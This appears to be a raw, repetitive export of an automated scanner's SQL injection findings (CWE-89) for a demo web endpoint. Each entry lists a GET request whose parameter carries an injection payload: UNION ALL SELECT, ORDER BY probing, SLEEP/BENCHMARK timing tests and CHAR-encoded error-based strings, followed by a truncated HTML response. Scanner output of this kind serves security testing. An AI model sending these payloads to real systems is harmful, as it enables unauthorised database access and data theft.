href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1283\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 29--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1284\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1285Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1286\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AnD SLEEP(5)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1287\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# (SELECT * FROM (SELECT(SLEEP(5)))ecMj)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1288\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# \")) or sleep(5)=\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1289\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1290\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1291\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' or ''*'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1292\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1293Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1294\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1' GROUP BY 1,2,--+\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1295\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1296\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# ORDER BY 17--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 